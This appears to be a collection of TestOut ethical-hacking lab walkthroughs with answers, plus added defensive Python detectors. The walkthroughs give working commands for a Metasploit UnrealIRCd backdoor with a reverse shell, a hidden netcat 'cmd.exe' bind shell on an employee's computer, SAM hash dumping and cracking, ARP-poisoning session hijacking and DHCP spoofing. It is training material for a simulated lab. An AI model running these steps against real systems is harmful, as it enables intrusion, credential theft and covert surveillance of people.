Grandma Jacklin / FW: FW: FW: Virus Attack Warning | Hoax | Delete | Any email that asks you to forward it to everyone you know is probably a hoax.
Emily Smith / Web Site Update | Spear Phishing | Delete | While this email appears to come from a colleague, notice that the link points to an executable file from a Russian domain name. This probably is not a message a real colleague would send. This file will likely infect the computer with malware.
Sara Goodwin / Wow!! | Malicious Attachment | Delete | Emails with attachments from random people who address you as "Dear Friend" are probably not safe.
Grandma Jacklin / Free Airline Tickets | Hoax | Delete | Any email that asks you to forward it to everyone you know is probably a hoax, even if the contents promise you a prize. In addition, there is no way to know how many people the email has been forwarded to.
Human Resources / IMPORTANT NOTICE-Action Required | Safe | Keep | While this email appears very urgent, it doesn't ask you to click on anything or run any attachments. It does inform you that you need to go to a website that you should already know and make sure your courses are complete.
Activities Committee / Pumpkin Contest | Safe | Keep | This email doesn't ask you to click on anything or run any attachments.
Robert Williams / Presentation | Safe | Keep | This email doesn't ask you to click on anything or run any attachments.
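The hover check used throughout this lab (compare what a link shows with where it really goes) can be applied automatically to an HTML message body. The Python below is an added example, not part of the TestOut lab; the sample messages, the corpnet.example trusted domain and the finding names are constructed for illustration, and it does not verify digital signatures.

```python
"""Added example: flag the link red flags this lab describes (constructed data)."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".bat", ".cmd", ".msi", ".js", ".vbs")


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def displayed_host(text):
    """Return the host shown in the link text when the text looks like a URL or domain."""
    words = text.split()
    candidate = words[0] if words else ""
    if "://" not in candidate:
        candidate = "//" + candidate
    try:
        host = urlsplit(candidate).hostname or ""
    except ValueError:
        return ""
    return host if "." in host else ""


def check_link(href, text, trusted_suffixes):
    """Return the list of red flags for one link (empty list means none found)."""
    try:
        parts = urlsplit(href)
    except ValueError:
        return ["unparseable-url"]
    host = (parts.hostname or "").lower()
    findings = []
    if parts.scheme != "https":
        findings.append("not-https")            # the safe HR mail used a secure link
    if host_is_ip(host):
        findings.append("ip-address-host")      # the Online Banking mail
    if parts.path.lower().endswith(EXECUTABLE_EXTENSIONS):
        findings.append("executable-download")  # the Emily Smith mail
    shown = displayed_host(text)
    if shown and shown != host:
        findings.append("text-host-mismatch")   # link text names a different site
    if not any(host == s or host.endswith("." + s) for s in trusted_suffixes):
        findings.append("untrusted-domain")
    return findings


def analyze_email(html, trusted_suffixes):
    collector = LinkCollector()
    collector.feed(html)
    return {href: check_link(href, text, trusted_suffixes) for href, text in collector.links}


# Constructed sample bodies modelled on three rows of the table above.
TRUSTED = ("corpnet.example",)
BANK_MAIL = '<p>Payment pending: <a href="http://203.0.113.77/login">www.creditunion.example</a></p>'
COLLEAGUE_MAIL = '<p>See <a href="http://files.partner.example/site_update.exe">Web site update</a></p>'
HR_MAIL = '<p>Watch the <a href="https://intranet.corpnet.example/ethics-video">Ethics video</a></p>'

if __name__ == "__main__":
    for body in (BANK_MAIL, COLLEAGUE_MAIL, HR_MAIL):
        print(analyze_email(body, TRUSTED))
```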
QUESTION 5:
You are an ethical hacker consultant working for CorpNet. They want
you to discover weaknesses in their network. From outside the
CorpNet network, you used Zenmap and discovered that the
www_stage server located in CorpNet's DMZ is running an exploitable
application named UnrealIRCd. This allows you to set up a backdoor
using Metasploit.
In this lab, your task is to:
• Create a backdoor on www_stage using Metasploit by exploiting the UnrealIRCd application using the following information:
  o Search for Unreal exploits.
  o Use the exploit that allows Backdoor Command Execution.
  o Configure the remote host (RHOST) with the 198.28.1.15 IP address; the same IP address as www_stage.
  o Set the payload to the cmd/unix/reverse payload.
  o Verify that the local host (LHOST) was set to the 147.191.29.15 IP address (the same IP address as Consult-Lap2).
  o Execute the exploit.
  o Read the contents of the text file in the /root directory.
• Answer the question.
“In Terminal, you can highlight the text and right-click it to copy and paste the highlighted text to the cursor's location.”
Your Performance
Your Score: 2 of 2 (100%)
Pass Status: Pass
Elapsed Time: 8 minutes 18 seconds
Required Score: 100%
Task Summary
Lab Questions
Create a backdoor on www_stage by exploiting the UnrealIRCd application
Q1 What is the name of the new feature added to the tracking app on www_stage?
Explanation
Complete this lab as follows:
1. Search for UnrealIRCd exploits and review the exploit information as follows:
   a. From the Favorites bar, open Metasploit Framework.
   b. At the prompt, type search Unreal and press Enter to search for any UnrealIRCd exploits.
   c. Type info exploit/unix/irc/unreal_ircd_3281_backdoor and press Enter to review the exploit information.
      Notice that RHOST is required.
2. Use the exploit/unix/irc/unreal_ircd_3281_backdoor exploit and configure the exploit's RHOST IP address as follows:
   a. Type use exploit/unix/irc/unreal_ircd_3281_backdoor and press Enter to use the exploit.
   b. Type show options and press Enter.
      Notice the absence of the current setting for RHOST.
   c. Type set RHOST 198.28.1.15 and press Enter to configure the remote host setting.
   d. Type show options and press Enter to confirm that RHOST is set.
3. Set the payload as follows:
   a. Type show payloads and press Enter to list available payloads.
   b. Type set payload cmd/unix/reverse and press Enter to specify the correct payload.
   c. Type show options and press Enter to review the exploit's configuration.
      Notice that LHOST is automatically set to the IP address for Consult-Lap2.
4. Execute the exploit and examine the text file in the /root directory as follows:
   a. Type exploit and press Enter to execute the exploit.
   b. Type ifconfig and press Enter to confirm that the backdoor has been established.
      Notice the IP address is 198.28.1.15; the same IP address as www_stage.
   c. Type pwd and press Enter to confirm you are in the /root directory.
   d. Type ls and press Enter to list the files in the /root directory.
   e. Type cat Staging_Features_CONFIDENTIAL.txt and press Enter to review the contents of a file that appears to contain sensitive information.
5. In the top right, select Answer Questions.
6. Answer the question.
7. Select Score Lab.
Lab Questions:
1. In Terminal, you can highlight the text.
2. Right-click it to copy and paste the highlighted text to the cursor’s location.
QUESTION 6:
You are the IT security administrator for a small corporate
network. You suspect an employee is misusing a company computer
by downloading copyrighted music files at work and storing them on
an external drive. You notice that the employee has gone to lunch and
decide to use this opportunity to set up a backdoor access and to
investigate the external drive at a later time when the employee
connects the drive to the computer. You begin by installing netcat on
the employee's computer and adding the C:/netcat folder to the path
environment variable so that it can be run outside of the folder.
In this lab, your task is to:
• Run netcat from a PowerShell window on Office1 as follows:
  o Execute netcat in detached mode so that it runs in the background when the command prompt window is closed.
  o Execute netcat in listen mode.
  o Configure netcat to listen for connections on port 2222.
  o Configure netcat to execute cmd.exe when a connection is made.
• Run netcat on IT-Laptop and connect to Office1 as follows:
  o Connect using the hostname or IP address.
  o Connect using port 2222.
• Inspect the external hard drive (G: drive) for music and video files.
“The second task would be performed after the employee returned from lunch and connected an external drive to Office1.”
Your Performance
Your Score: 3 of 3 (100%)
Pass Status: Pass
Elapsed Time: 1 minute 59 seconds
Required Score: 100%
Task Summary
Required Actions
Execute netcat on Office1 (listen mode)
Execute netcat on IT-Laptop (client mode)
Inspect external hard drive (G: drive)
Explanation
Complete this lab as follows:
1. On Office1, run netcat from a PowerShell window as follows:
   a. Right-click Start and select Windows PowerShell (Admin).
   b. At the prompt, type nc -dlp 2222 -e cmd.exe and press Enter to start netcat in listen mode.
   c. Close the PowerShell window so the employee doesn't see an open window.
2. On IT-Laptop, run netcat to connect to Office1 as follows:
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under IT Administration, select IT-Laptop.
   c. From the Favorites bar, open Terminal.
   d. At the prompt, type nc Office1 2222 and press Enter to start netcat in client mode.
3. Type dir /s g: and press Enter to inspect the G: drive.
QUESTION 7:
As the cybersecurity specialist for your company, you're performing a
penetration test. As part of this test, you're checking to see if the
Security Account Manager (SAM) passwords from a Windows system
can be cracked using John the Ripper.
In this lab, your task is to crack the SAM passwords as follows:
• On Office 1, use pwdump7 to export the contents of the SAM to SAMhash.txt. This machine has already been booted into a recovery mode, allowing you to use Troubleshoot > Advanced > Command Prompt to access the SAM file.
• Copy the exported file to the thumb drive (g: drive) and then move the thumb drive to the IT-Laptop computer. After the thumb drive is inserted, it is automatically mounted to /media/root/ESD-USB/.
• On IT-Laptop, crack the password using the echo and John the Ripper commands.
“Use the cat command to display the password hash file that was copied to the thumb drive. Do NOT run the echo or John the Ripper commands from the thumb drive.”
Your Performance
Your Score: 4 of 4 (100%)
Pass Status: Pass
Elapsed Time: 8 minutes 23 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Use cat /media/root/ESD-USB/file_name.txt to display the password hashes contained in the file
Use the echo command to create a new hash file that contains the Admin's NTLM hash
Use John the Ripper to crack the password
Q1 What is the password found in the cracked SAM?
Explanation
In this lab, your task is to crack the SAM passwords as follows:
• On Office 1, use pwdump7 to export the contents of the SAM to SAMhash.txt.
• Copy the exported file to the thumb drive and move the thumb drive to the IT-Laptop computer.
• On IT-Laptop, crack the password using the echo and John the Ripper commands.
Complete this lab as follows:
1. Use pwdump7 to create a text file containing the SAM password hashes and copy the new file to the thumb drive as follows:
   a. From the recovery dialog, select Troubleshoot.
   b. Select Advanced options.
   c. Select Command Prompt.
   d. Type pwdump7 > SAMhash.txt and press Enter.
   e. Type copy SAMhash.txt g: and press Enter.
2. Move the thumb drive from Office 1 to the IT-Laptop computer as follows:
   a. From the top navigation tabs, select Office 1.
   b. Select the USB Thumb Drive plugged into the front of the computer.
   c. Drag the USB Thumb Drive to the Shelf so you can access it later in the IT Administration office.
   d. From the top navigation tabs, select Floor 1 Overview.
   e. Under IT Administration, select Hardware.
   f. Above IT-Laptop, select Back to switch to the back view of the laptop.
   g. From the Shelf, drag the USB Thumb Drive to a USB port on the laptop computer.
   h. Above IT-Laptop, select Front to switch to the front view of the laptop.
   i. On the monitor, select Click to view Linux.
3. Create a new hash file that contains the hash to be cracked as follows:
   a. From the Favorites bar, open Terminal.
   b. Type cat /media/root/ESD-USB/SAMhash.txt and press Enter.
   c. Type echo.
   d. Press the space bar.
   e. In the Admin line of the output, select the hash in the fourth field. Each field is separated by a colon. This is the hash value that needs to be cracked.
   f. Right-click the hash in the fourth field of the Admin line.
      Notice that the hash was pasted into the command line.
   g. Press the space bar.
   h. Type > SAMhash.txt.
   i. Press Enter.
4. Use John the Ripper and the new hash file to crack the password as follows:
   a. Type john SAMhash.txt and press Enter.
   b. From the output, find the Admin's password.
   c. In the top right, select Answer Questions.
   d. Answer the questions.
   e. Select Score Lab.
Lab Questions:
1. What is the password found in the cracked SAM?
   a. P@55word!
QUESTION 8:
You are the IT security administrator for a small corporate network.
The HR director is concerned that an employee is doing something
sneaky on the company's employee portal and has authorized you to
hijack his web session so you can investigate.
In this lab, your task is to hijack a web session as follows:
• On IT-Laptop, use Ettercap to sniff traffic between the employee's computer in Office1 and the gateway.
• Initiate a man-in-the-middle attack to capture the session ID for the employee portal logon.
• On Office1, log in to the employee portal on rmksupplies.com using Chrome and the following credentials:
  o Username: bjackson
  o Password: $uper$ecret1
• On IT-Laptop, copy the session ID detected in Ettercap.
• On Office2, navigate to rmksupplies.com and use the cookie editor plug-in in Chrome to inject the session ID cookie.
• Verify that you hijacked the session.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status: Pass
Elapsed Time: 12 minutes 49 seconds
Required Score: 100%
Task Summary
Required Actions
Select the enp2s0 interface
Set Office1 as a target
Set the gateway as a target
Launch the MITM Arp poison attack with Sniff Remote Connections
Login to RMKSupplies on Office1
Hijack the session on Office2
Explanation
Complete this lab as follows:
1. On IT-Laptop, open Terminal from the sidebar.
2. At the prompt, type host office1 and press Enter to get the IP address of Office1.
3. Type route and press Enter to get the gateway address.
4. Use Ettercap to sniff traffic between Office1 and the gateway as follows:
   a. From the Favorites bar, open Ettercap.
   b. Maximize the window for easier viewing.
   c. Select Sniff > Unified sniffing.
   d. From the Network Interface drop-down list, select enp2s0.
   e. Click OK.
   f. Select Hosts > Scan for hosts.
   g. Select Hosts > Host list.
      We want to target information between Office1 (192.168.0.33) and the gateway (192.168.0.5).
   h. Under IP Address, select 192.168.0.5.
   i. Select Add to Target 1.
   j. Select 192.168.0.33.
   k. Select Add to Target 2.
5. Initiate a man-in-the-middle attack as follows:
   a. Select Mitm > ARP poisoning.
   b. Select Sniff remote connections.
   c. Click OK. You are ready to capture traffic.
6. On Office1, log in to the employee portal on rmksupplies.com as follows:
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under Office 1, select Office1.
   c. From the taskbar, open Chrome.
   d. Maximize the window for easier viewing.
   e. In the URL field, enter rmksupplies.com.
   f. Press Enter.
   g. At the bottom of the page, select Employee Portal.
   h. In the Username field, enter bjackson.
   i. In the Password field, enter $uper$ecret1.
   j. Click Login.
      You are logged into the portal as Blake Jackson.
7. On IT-Laptop, copy the session ID detected in Ettercap as follows:
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under IT Administration, select IT-Laptop.
   c. In the Ettercap console, find bjackson's username, password, and session cookie (.login) captured in Ettercap.
   d. Highlight the session ID.
   e. Press Ctrl + C to copy.
8. On Office2, go to rmksupplies.com and use the cookie editor plug-in to inject the session ID cookie as follows:
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under Office 2, select Office2.
   c. From the taskbar, open Chrome.
   d. Maximize the window for easier viewing.
   e. In Chrome's URL field, enter rmksupplies.com.
   f. Press Enter.
   g. In the top right corner, select cookie to open the cookie editor.
   h. At the top, select the plus + sign to add a new session cookie.
   i. In the Name field, enter .login
   j. In the Value field, press Ctrl + V to paste in the session cookie you copied from Ettercap.
   k. Make sure rmksupplies.com is in the Domain field.
   l. Select the green check mark to save the cookie.
   m. Click outside the cookie editor to close the editor.
9. At the bottom of the rmksupplies page, select Employee Portal.
   You are now on Blake Jackson's web session.
QUESTION 9:
You are a cybersecurity consultant. The company hiring you suspects
that employees are connecting to a rogue access point (AP). You
need to find the name of the hidden rogue AP so it can be
deauthorized. The computer suspected of using the rogue access
point is Exec-Laptop.
In this lab, your task is to complete the following:
• On IT-Laptop, use airmon-ng to put the wireless adapter in monitor mode.
• Use airodump-ng to find the hidden access point.
• On Exec-Laptop, connect to the rogue AP using the CoffeeShop SSID.
• Answer the question.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status: Pass
Elapsed Time: 4 minutes 5 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Set the wlp1s0 wireless adapter to monitor mode
Find the hidden access point
Q1 What is the BSSID of the rogue access point?
Explanation
Complete this lab as follows:
1. On IT-Laptop, configure the wlp1s0 card to run in monitor mode as follows:
   a. From the Favorites bar, open Terminal.
   b. At the prompt, type airmon-ng and press Enter to find the name of the wireless adapter.
   c. Type airmon-ng start wlp1s0 and press Enter to put the adapter in monitor mode.
   d. Type airmon-ng and press Enter to view the new name of the wireless adapter.
2. Use airodump-ng to discover and isolate the hidden access point as follows:
   a. Type airodump-ng wlp1s0mon and press Enter to discover all of the access points.
   b. Press Ctrl + c to stop airodump-ng.
   c. Find the hidden access point ESSID <length : 0>.
   d. In the top right, select Answer Questions.
   e. Answer the question.
   f. In Terminal, type airodump-ng wlp1s0mon --bssid bssid_number and press Enter to isolate the hidden access point.
3. Switch to the Exec-Laptop and connect to the Wi-Fi network as follows:
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under Executive Office, select Exec-Laptop.
   c. From the notification area, select the Wi-Fi network icon.
   d. Select Hidden Network.
   e. Select Connect.
   f. In the Enter the name (SSID) for the network field, type CoffeeShop.
      In a real environment, you'll only need to wait until the employee connects to the rogue access point again.
   g. Select Next.
   h. Select Yes.
   i. Under Lab Questions, select Score Lab.
Lab Questions:
1. What is the BSSID of the rogue access point?
   a. 00:00:1B:11:22:33
A.2.3 Pro Domain 3: Attack
QUESTION 1:
You are the cybersecurity specialist for your company. You need to
check to see if any clear text passwords are being exposed to hackers
through an HTTP login request.
In this lab, your task is to analyze HTTP POST packets as follows:
• Use Wireshark to capture all packets.
• Filter the captured packets to show only HTTP POST data.
• Examine the packets captured to find clear text passwords.
• Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status: Pass
Elapsed Time: 2 minutes 15 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Filter the captured packets to show only HTTP POST data
Q1 How many HTTP POST packets were captured?
Q2 What is the source IP address of the packet containing the clear text password?
Q3 What is the clear text password captured?
Explanation
Complete this lab as follows:
1. From the Favorites bar, open Wireshark.
2. Under Capture, select enp2s0.
3. Select the blue fin to begin a Wireshark capture.
4. Capture packets for five seconds.
5. Select the red box to stop the Wireshark capture.
6. Maximize Wireshark for easier viewing.
7. In the Apply a display filter field, type http.request.method==POST and press Enter to show the HTTP POST requests.
8. From the middle pane, expand HTML Form URL Encoded for each packet.
9. Examine the information shown to find clear text passwords.
10. In the top right, select Answer Questions.
11. Answer the questions.
12. Select Score Lab.
Lab Questions:
1. How many HTTP POST packets were captured?
   a. 3
2. What is the source IP address of the packets containing the clear text password?
   a. 192.168.0.98
3. What is the captured clear text password?
   a. St0ne$@
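The manual check in this lab (filter for POST requests, then expand HTML Form URL Encoded) can be repeated over reassembled requests to find which internal clients still send credentials over plain HTTP. The Python below is an added example, not part of the TestOut lab; the requests, the intranet.example host, the field-name list and all values except the 192.168.0.98 source address are constructed, and findings are masked so the report does not itself store the password.

```python
"""Added example: report credential fields sent in cleartext HTTP POSTs (constructed data)."""
from urllib.parse import parse_qsl

SENSITIVE_NAMES = ("pass", "pwd", "secret", "token")  # assumed field-name hints
FORM_TYPE = "application/x-www-form-urlencoded"


def parse_http_request(raw):
    """Split a raw HTTP/1.x request (bytes) into method, path, headers, body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP header block")
    lines = head.decode("iso-8859-1").split("\r\n")
    try:
        method, path, _version = lines[0].split(" ", 2)
    except ValueError:
        raise ValueError("malformed request line") from None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def mask(value):
    """Keep the first character only, so the finding is reportable."""
    return value[:1] + "*" * (len(value) - 1) if value else ""


def find_cleartext_credentials(records):
    """records: iterable of (src_ip, raw_request_bytes) observed over plain HTTP."""
    findings = []
    for src_ip, raw in records:
        try:
            method, path, headers, body = parse_http_request(raw)
        except ValueError:
            continue  # not a complete request; nothing to inspect
        if method != "POST":
            continue  # same scope as http.request.method==POST
        ctype = headers.get("content-type", "").split(";")[0].strip().lower()
        if ctype != FORM_TYPE:
            continue  # only the "HTML Form URL Encoded" case is covered here
        declared = headers.get("content-length", "")
        if declared.isdigit():
            body = body[:int(declared)]  # ignore bytes past the declared body
        fields = parse_qsl(body.decode("iso-8859-1"), keep_blank_values=True)
        for name, value in fields:
            if any(hint in name.lower() for hint in SENSITIVE_NAMES):
                findings.append({
                    "src": src_ip,
                    "host": headers.get("host", ""),
                    "path": path,
                    "field": name,
                    "value_masked": mask(value),
                })
    return findings


def make_request(method, path, content_type, body):
    """Build a raw request for the constructed samples below."""
    head = f"{method} {path} HTTP/1.1\r\nHost: intranet.example\r\n"
    if body:
        head += f"Content-Type: {content_type}\r\nContent-Length: {len(body)}\r\n"
    return head.encode() + b"\r\n" + body


# Constructed capture: three POSTs and one GET; only one POST carries a password.
SAMPLE_RECORDS = [
    ("192.168.0.98", make_request("POST", "/login", FORM_TYPE,
                                  b"username=jdoe&password=Example%24Pass1")),
    ("192.168.0.61", make_request("POST", "/search", FORM_TYPE, b"q=printer+toner")),
    ("192.168.0.72", make_request("POST", "/api/ping", "application/json", b'{"ok":true}')),
    ("192.168.0.61", make_request("GET", "/", "", b"")),
]

if __name__ == "__main__":
    for finding in find_cleartext_credentials(SAMPLE_RECORDS):
        print(finding)
```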
QUESTION 2:
You are the IT security administrator for a small corporate network.
You're experimenting with DHCP spoofing attacks using Ettercap.
In this lab, your task is to complete the following:
• On IT-Laptop, use Ettercap to launch a man-in-the-middle DHCP spoofing attack using the following parameters:
  o Netmask: 255.255.255.0
  o DNS Server IP: 192.168.0.11
• On Support, complete the following tasks:
  o Start a capture in Wireshark and filter the display for DHCP traffic.
  o View the IP address and the gateway in Terminal.
  o Bring the network interface down and back up to request a new DHCP address.
  o In Wireshark, how many DHCP packets were exchanged?
  o View the IP address and gateway again. What has changed?
• On Office1, complete the following tasks:
  o Use tracert to rmksupplies.com to find the path. What is the path?
  o Check the IP address of the computer.
  o Release and renew the IP address assigned by DHCP.
  o Check the IP address of the computer again. What has changed?
  o Use tracert to rmksupplies.com to find the path again. What has changed?
  o Log in to the rmksupplies.com employee portal with the following credentials:
    ▪ Username: bjackson
    ▪ Password: $uper$ecret1
• On IT-Laptop, find the captured username and password in Ettercap.
• Answer the questions.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status: Pass
Elapsed Time: 8 minutes 25 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
On IT-Laptop, launch a DHCP MITM attack using Ettercap
On Support:
View the DHCP traffic in Wireshark with the bootp filter
Refresh the network interface to get a new IP address from DHCP
Q1 How many DHCP packets were captured in Wireshark?
Q2 Which gateway addresses are provided in the ACK packets?
On Office1:
Use tracert to view the path to rmksupplies.com
Use ipconfig to release and renew the assigned IP address
Login to the rmksupplies.com Employee Portal
Explanation
Complete this lab as follows:
1. On IT-Laptop, start unified sniffing on the enp2s0 interface as follows:
   a. From the Favorites bar, select Ettercap.
   b. Select Sniff > Unified sniffing.
   c. From the Network Interface drop-down list, select enp2s0.
   d. Click OK.
   e. Select Mitm > DHCP spoofing.
   f. In the Netmask field, enter 255.255.255.0.
   g. In the DNS Server IP field, enter 192.168.0.11.
   h. Click OK.
2. On Support, start a capture that filters for bootp packets as follows:
   a. From top navigation tabs, select Floor 1 Overview.
   b. Under Support Office, select Support.
   c. From the Favorites bar, open Wireshark.
   d. Under Capture, select enp2s0.
   e. Select the blue fin to begin a Wireshark capture.
   f. In the Apply a display filter field, type bootp and press Enter.
3. Request a new IP address as follows:
   a. From the Favorites bar, open Terminal.
   b. At the prompt, type ip addr show and press Enter.
      The IP address for enp2s0 is 192.168.0.45.
   c. Type route and press Enter.
      The gateway is 192.168.0.5.
   d. Type ip link set enp2s0 down and press Enter.
   e. Type ip link set enp2s0 up and press Enter to bring the interface back up.
   f. Maximize Wireshark for easier viewing.
      In Wireshark, under the Info column, notice that there are two DHCP ACK packets. One is the real acknowledgment (ACK) packet from the DHCP server, and the other is the spoofed ACK packet.
   g. Select the first DHCP ACK packet received.
   h. In the middle panel, expand Bootstrap Protocol (ACK).
   i. Expand Option: (3) Router.
      Notice the IP address for the router.
   j. Repeat steps 3g-3i for the second ACK packet.
   k. In the top right, select Answer Questions.
   l. Answer the questions.
   m. Minimize Wireshark.
4. View the current IP addresses as follows:
   a. In Terminal at the prompt, type ip addr show and press Enter.
      The IP address is 192.168.0.45.
   b. Type route and press Enter.
      The current gateway is 192.168.0.46. This is the address of the computer performing the man-in-the-middle attack.
5. On Office1, view the current route and IP address as follows:
   a. From top navigation tabs, select Floor 1 Overview.
   b. Under Office 1, select Office1.
   c. Right-click Start and select Windows PowerShell (Admin).
   d. Type tracert rmksupplies.com and press Enter.
      Notice that the first hop is 192.168.0.5.
   e. Type ipconfig /all and press Enter to view the IP address configuration for the computer.
      The configuration for Office1 is as follows:
      ▪ IP address: 192.168.0.33
      ▪ Gateway: 192.168.0.5
      ▪ DHCP server: 192.168.0.14
   f. At the prompt, type ipconfig /release and press Enter to release the currently assigned addresses.
   g. Type ipconfig /renew and press Enter to request a new IP address from the DHCP server.
      Notice that the default gateway has changed to the attacker's computer which has an IP address of 192.168.0.46.
   h. Type tracert rmksupplies.com and press Enter.
      Notice that the first hop is now 192.168.0.46 (the address of the attacker's computer).
6. In Google Chrome, log into the rmksupplies.com employee portal as follows:
   a. From the taskbar, open Google Chrome.
   b. Maximize the window for easier viewing.
   c. In the URL field, enter rmksupplies.com and press Enter.
   d. At the bottom of the page, select Employee Portal.
   e. In the Username field, enter bjackson.
   f. In the Password field, enter $uper$ecret1.
   g. Select Login. You are logged in as Blake Jackson.
7. From IT-Laptop, find the captured username and password in Ettercap as follows:
   a. From top navigation tabs, select Floor 1 Overview.
   b. Under IT Administration, select IT-Laptop.
   c. Maximize Ettercap.
   d. In Ettercap's bottom pane, find the username and password used to log in to the employee portal.
8. In the top right, select Answer Questions to end the lab.
9. Select Score Lab.
Lab Questions:
1. How many DHCP packets were captured in Wireshark?
   a. 5
2. Which gateway addresses are provided in the ACK packets?
   a. 192.168.0.5
   b. 192.168.0.46
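The tell-tale sign in this lab, two DHCP ACKs for one client that carry different Option 3 (Router) values, is something a monitoring host can check for automatically. The Python below is an added example, not part of the TestOut lab: it parses raw BOOTP/DHCP payloads and flags ACKs from servers outside an allowlist and clients that were offered conflicting gateways. The client MAC, transaction ID and the spoofed ACK's server identifier are constructed assumptions; the 192.168.0.x addresses come from the walk-through above.

```python
"""Added example: spot spoofed DHCP ACKs in captured payloads (constructed data)."""
import socket
import struct
from collections import defaultdict

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_ROUTER, OPT_DNS, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 0, 3, 6, 53, 54, 255
DHCP_OFFER, DHCP_ACK = 2, 5


def parse_dhcp(payload):
    """Parse a BOOTP/DHCP UDP payload; raise ValueError if it is malformed."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    msg = {
        "xid": struct.unpack("!I", payload[4:8])[0],
        "yiaddr": socket.inet_ntoa(payload[16:20]),
        "client_mac": ":".join(f"{b:02x}" for b in payload[28:34]),
        "options": {},
    }
    i = 240
    while i < len(payload):
        code = payload[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        msg["options"][code] = value
        i += 2 + length
    return msg


def ipv4_list(value):
    """Decode an option holding one or more 4-byte IPv4 addresses."""
    usable = len(value) - len(value) % 4
    return [socket.inet_ntoa(value[i:i + 4]) for i in range(0, usable, 4)]


def find_rogue_acks(payloads, authorized_servers):
    """Flag ACKs from unknown servers and clients handed conflicting gateways."""
    routers_by_client = defaultdict(set)
    findings = []
    for payload in payloads:
        try:
            msg = parse_dhcp(payload)
        except ValueError:
            continue  # not DHCP or damaged; skip
        opts = msg["options"]
        if opts.get(OPT_MSG_TYPE) != bytes([DHCP_ACK]):
            continue
        servers = ipv4_list(opts.get(OPT_SERVER_ID, b""))
        server = servers[0] if servers else None
        routers = ipv4_list(opts.get(OPT_ROUTER, b""))
        routers_by_client[msg["client_mac"]].update(routers)
        if server not in authorized_servers:
            findings.append({"type": "unauthorized-server", "server": server,
                             "routers": routers, "client": msg["client_mac"]})
    for mac, routers in routers_by_client.items():
        if len(routers) > 1:
            findings.append({"type": "conflicting-gateways", "client": mac,
                             "routers": sorted(routers)})
    return findings


def build_dhcp(msg_type, xid, mac, yiaddr, server_id, router, dns):
    """Build a minimal DHCP server reply (constructed test data, not a capture)."""
    pkt = struct.pack("!BBBBIHH", 2, 1, 6, 0, xid, 0, 0)    # op, htype, hlen, hops, xid, secs, flags
    pkt += socket.inet_aton("0.0.0.0") + socket.inet_aton(yiaddr)     # ciaddr, yiaddr
    pkt += socket.inet_aton(server_id) + socket.inet_aton("0.0.0.0")  # siaddr, giaddr
    pkt += bytes.fromhex(mac.replace(":", "")).ljust(16, b"\x00")     # chaddr
    pkt += bytes(64 + 128) + MAGIC_COOKIE                             # sname, file, cookie
    pkt += bytes([OPT_MSG_TYPE, 1, msg_type])
    pkt += bytes([OPT_SERVER_ID, 4]) + socket.inet_aton(server_id)
    pkt += bytes([OPT_ROUTER, 4]) + socket.inet_aton(router)
    pkt += bytes([OPT_DNS, 4]) + socket.inet_aton(dns)
    return pkt + bytes([OPT_END])


AUTHORIZED_SERVERS = {"192.168.0.14"}   # the DHCP server shown by ipconfig /all
CLIENT_MAC = "00:11:22:33:44:55"        # constructed
XID = 0x1A2B3C4D                        # constructed
SAMPLE_PAYLOADS = [
    build_dhcp(DHCP_OFFER, XID, CLIENT_MAC, "192.168.0.45", "192.168.0.14", "192.168.0.5", "192.168.0.11"),
    build_dhcp(DHCP_ACK, XID, CLIENT_MAC, "192.168.0.45", "192.168.0.14", "192.168.0.5", "192.168.0.11"),
    # Spoofed ACK: the server identifier 192.168.0.46 is an assumption for this sample.
    build_dhcp(DHCP_ACK, XID, CLIENT_MAC, "192.168.0.45", "192.168.0.46", "192.168.0.46", "192.168.0.11"),
]

if __name__ == "__main__":
    for finding in find_rogue_acks(SAMPLE_PAYLOADS, AUTHORIZED_SERVERS):
        print(finding)
```

On managed switches, DHCP snooping addresses the same problem at the port level by dropping server replies that arrive on untrusted ports.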
QUESTION 3:
CorpNet.xyz has hired you as a penetration testing consultant. While
visiting the company, you connected a small computer to the switch in
the Networking Closet. This computer also functions as a rogue
wireless access point. Now you are sitting in your van in the parking
lot of CorpNet.xyz, where you have connected to the internal network
through the rogue wireless access point. Using the small computer
you left behind, you can perform remote exploits against the company.
In this lab, your task is to complete the following:
•
On Consult-Lap2, use
ssh -X
to connect to your rogue computer
using the following parameters:
o
IP address:
192.168.0.251
o
Password:
$uper$neaky
•
Use Ettercap and the following parameters to launch a DHCP
spoofing man-in-the-middle attack on your rogue computer and
attempt to capture any unsecure passwords:
o
Network Interface:
enp2s0
o
Netmask:
255.255.255.0
o
DNS Server IP address:
192.168.0.11
•
